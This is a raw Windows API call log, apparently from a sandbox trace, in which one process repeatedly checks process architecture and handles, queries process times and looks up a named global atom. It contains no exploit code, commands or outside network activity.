	[0131.598] CloseHandle (hObject=0x2dc) returned 1
	[0131.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.599] CloseHandle (hObject=0x2dc) returned 1
	[0131.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.599] CloseHandle (hObject=0x2dc) returned 1
	[0131.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.599] CloseHandle (hObject=0x2dc) returned 1
	[0131.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.599] CloseHandle (hObject=0x2dc) returned 1
	[0131.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.599] CloseHandle (hObject=0x2dc) returned 1
	[0131.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.600] CloseHandle (hObject=0x2dc) returned 1
	[0131.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.600] CloseHandle (hObject=0x2dc) returned 1
	[0131.600] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.601] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.601] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.601] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.602] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.602] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.602] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.602] CloseHandle (hObject=0x2dc) returned 1
	[0131.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.602] CloseHandle (hObject=0x2dc) returned 1
	[0131.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.602] CloseHandle (hObject=0x2dc) returned 1
	[0131.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.602] CloseHandle (hObject=0x2dc) returned 1
	[0131.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.603] CloseHandle (hObject=0x2dc) returned 1
	[0131.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.603] CloseHandle (hObject=0x2dc) returned 1
	[0131.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.635] CloseHandle (hObject=0x2dc) returned 1
	[0131.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.636] CloseHandle (hObject=0x2dc) returned 1
	[0131.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.636] CloseHandle (hObject=0x2dc) returned 1
	[0131.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.636] CloseHandle (hObject=0x2dc) returned 1
	[0131.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.636] CloseHandle (hObject=0x2dc) returned 1
	[0131.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.637] CloseHandle (hObject=0x2dc) returned 1
	[0131.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.637] CloseHandle (hObject=0x2dc) returned 1
	[0131.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.637] CloseHandle (hObject=0x2dc) returned 1
	[0131.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.638] CloseHandle (hObject=0x2dc) returned 1
	[0131.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.638] CloseHandle (hObject=0x2dc) returned 1
	[0131.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.638] CloseHandle (hObject=0x2dc) returned 1
	[0131.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.638] CloseHandle (hObject=0x2dc) returned 1
	[0131.638] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.639] CloseHandle (hObject=0x2dc) returned 1
	[0131.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.639] CloseHandle (hObject=0x2dc) returned 1
	[0131.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.639] CloseHandle (hObject=0x2dc) returned 1
	[0131.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.639] CloseHandle (hObject=0x2dc) returned 1
	[0131.639] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.639] CloseHandle (hObject=0x2dc) returned 1
	[0131.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.640] CloseHandle (hObject=0x2dc) returned 1
	[0131.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.640] CloseHandle (hObject=0x2dc) returned 1
	[0131.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.640] CloseHandle (hObject=0x2dc) returned 1
	[0131.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.640] CloseHandle (hObject=0x2dc) returned 1
	[0131.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.641] CloseHandle (hObject=0x2dc) returned 1
	[0131.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.641] CloseHandle (hObject=0x2dc) returned 1
	[0131.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.641] CloseHandle (hObject=0x2dc) returned 1
	[0131.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.641] CloseHandle (hObject=0x2dc) returned 1
	[0131.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.642] CloseHandle (hObject=0x2dc) returned 1
	[0131.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.642] CloseHandle (hObject=0x2dc) returned 1
	[0131.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.642] CloseHandle (hObject=0x2dc) returned 1
	[0131.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.642] CloseHandle (hObject=0x2dc) returned 1
	[0131.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.643] CloseHandle (hObject=0x2dc) returned 1
	[0131.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.643] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.643] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.644] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.644] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.644] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.644] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.644] CloseHandle (hObject=0x2dc) returned 1
	[0131.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.645] CloseHandle (hObject=0x2dc) returned 1
	[0131.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.645] CloseHandle (hObject=0x2dc) returned 1
	[0131.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.645] CloseHandle (hObject=0x2dc) returned 1
	[0131.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.645] CloseHandle (hObject=0x2dc) returned 1
	[0131.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.645] CloseHandle (hObject=0x2dc) returned 1
	[0131.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.679] CloseHandle (hObject=0x2dc) returned 1
	[0131.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.679] CloseHandle (hObject=0x2dc) returned 1
	[0131.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.679] CloseHandle (hObject=0x2dc) returned 1
	[0131.679] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.679] CloseHandle (hObject=0x2dc) returned 1
	[0131.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.680] CloseHandle (hObject=0x2dc) returned 1
	[0131.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.680] CloseHandle (hObject=0x2dc) returned 1
	[0131.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.680] CloseHandle (hObject=0x2dc) returned 1
	[0131.680] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.680] CloseHandle (hObject=0x2dc) returned 1
	[0131.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.681] CloseHandle (hObject=0x2dc) returned 1
	[0131.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.681] CloseHandle (hObject=0x2dc) returned 1
	[0131.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.681] CloseHandle (hObject=0x2dc) returned 1
	[0131.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.681] CloseHandle (hObject=0x2dc) returned 1
	[0131.681] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.681] CloseHandle (hObject=0x2dc) returned 1
	[0131.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.682] CloseHandle (hObject=0x2dc) returned 1
	[0131.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.682] CloseHandle (hObject=0x2dc) returned 1
	[0131.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.682] CloseHandle (hObject=0x2dc) returned 1
	[0131.682] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.682] CloseHandle (hObject=0x2dc) returned 1
	[0131.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.683] CloseHandle (hObject=0x2dc) returned 1
	[0131.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.683] CloseHandle (hObject=0x2dc) returned 1
	[0131.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.683] CloseHandle (hObject=0x2dc) returned 1
	[0131.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.683] CloseHandle (hObject=0x2dc) returned 1
	[0131.683] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.683] CloseHandle (hObject=0x2dc) returned 1
	[0131.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.684] CloseHandle (hObject=0x2dc) returned 1
	[0131.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.684] CloseHandle (hObject=0x2dc) returned 1
	[0131.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.684] CloseHandle (hObject=0x2dc) returned 1
	[0131.684] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.684] CloseHandle (hObject=0x2dc) returned 1
	[0131.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.685] CloseHandle (hObject=0x2dc) returned 1
	[0131.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.685] CloseHandle (hObject=0x2dc) returned 1
	[0131.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.685] CloseHandle (hObject=0x2dc) returned 1
	[0131.685] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.685] CloseHandle (hObject=0x2dc) returned 1
	[0131.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.686] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.686] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.686] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.687] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.687] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.687] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.687] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.687] CloseHandle (hObject=0x2dc) returned 1
	[0131.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.687] CloseHandle (hObject=0x2dc) returned 1
	[0131.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.688] CloseHandle (hObject=0x2dc) returned 1
	[0131.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.688] CloseHandle (hObject=0x2dc) returned 1
	[0131.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.688] CloseHandle (hObject=0x2dc) returned 1
	[0131.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.688] CloseHandle (hObject=0x2dc) returned 1
	[0131.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.721] CloseHandle (hObject=0x2dc) returned 1
	[0131.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.721] CloseHandle (hObject=0x2dc) returned 1
	[0131.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.721] CloseHandle (hObject=0x2dc) returned 1
	[0131.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.721] CloseHandle (hObject=0x2dc) returned 1
	[0131.721] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.721] CloseHandle (hObject=0x2dc) returned 1
	[0131.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.722] CloseHandle (hObject=0x2dc) returned 1
	[0131.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.722] CloseHandle (hObject=0x2dc) returned 1
	[0131.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.722] CloseHandle (hObject=0x2dc) returned 1
	[0131.722] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.722] CloseHandle (hObject=0x2dc) returned 1
	[0131.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.723] CloseHandle (hObject=0x2dc) returned 1
	[0131.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.723] CloseHandle (hObject=0x2dc) returned 1
	[0131.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.723] CloseHandle (hObject=0x2dc) returned 1
	[0131.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.723] CloseHandle (hObject=0x2dc) returned 1
	[0131.723] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.723] CloseHandle (hObject=0x2dc) returned 1
	[0131.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.724] CloseHandle (hObject=0x2dc) returned 1
	[0131.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.724] CloseHandle (hObject=0x2dc) returned 1
	[0131.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.724] CloseHandle (hObject=0x2dc) returned 1
	[0131.724] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.724] CloseHandle (hObject=0x2dc) returned 1
	[0131.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.725] CloseHandle (hObject=0x2dc) returned 1
	[0131.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.725] CloseHandle (hObject=0x2dc) returned 1
	[0131.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.725] CloseHandle (hObject=0x2dc) returned 1
	[0131.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.725] CloseHandle (hObject=0x2dc) returned 1
	[0131.725] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.726] CloseHandle (hObject=0x2dc) returned 1
	[0131.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.726] CloseHandle (hObject=0x2dc) returned 1
	[0131.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.726] CloseHandle (hObject=0x2dc) returned 1
	[0131.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.726] CloseHandle (hObject=0x2dc) returned 1
	[0131.726] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.726] CloseHandle (hObject=0x2dc) returned 1
	[0131.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.727] CloseHandle (hObject=0x2dc) returned 1
	[0131.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.727] CloseHandle (hObject=0x2dc) returned 1
	[0131.727] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.727] CloseHandle (hObject=0x2dc) returned 1
	[0131.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.728] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.728] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.728] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.729] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.729] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.729] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.729] CloseHandle (hObject=0x2dc) returned 1
	[0131.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.729] CloseHandle (hObject=0x2dc) returned 1
	[0131.729] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.729] CloseHandle (hObject=0x2dc) returned 1
	[0131.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.730] CloseHandle (hObject=0x2dc) returned 1
	[0131.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.730] CloseHandle (hObject=0x2dc) returned 1
	[0131.730] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.730] CloseHandle (hObject=0x2dc) returned 1
	[0131.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.763] CloseHandle (hObject=0x2dc) returned 1
	[0131.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.763] CloseHandle (hObject=0x2dc) returned 1
	[0131.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.763] CloseHandle (hObject=0x2dc) returned 1
	[0131.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.764] CloseHandle (hObject=0x2dc) returned 1
	[0131.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.764] CloseHandle (hObject=0x2dc) returned 1
	[0131.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.764] CloseHandle (hObject=0x2dc) returned 1
	[0131.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.764] CloseHandle (hObject=0x2dc) returned 1
	[0131.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.765] CloseHandle (hObject=0x2dc) returned 1
	[0131.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.765] CloseHandle (hObject=0x2dc) returned 1
	[0131.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.765] CloseHandle (hObject=0x2dc) returned 1
	[0131.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.765] CloseHandle (hObject=0x2dc) returned 1
	[0131.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.765] CloseHandle (hObject=0x2dc) returned 1
	[0131.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.766] CloseHandle (hObject=0x2dc) returned 1
	[0131.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.766] CloseHandle (hObject=0x2dc) returned 1
	[0131.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.766] CloseHandle (hObject=0x2dc) returned 1
	[0131.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.766] CloseHandle (hObject=0x2dc) returned 1
	[0131.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.767] CloseHandle (hObject=0x2dc) returned 1
	[0131.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
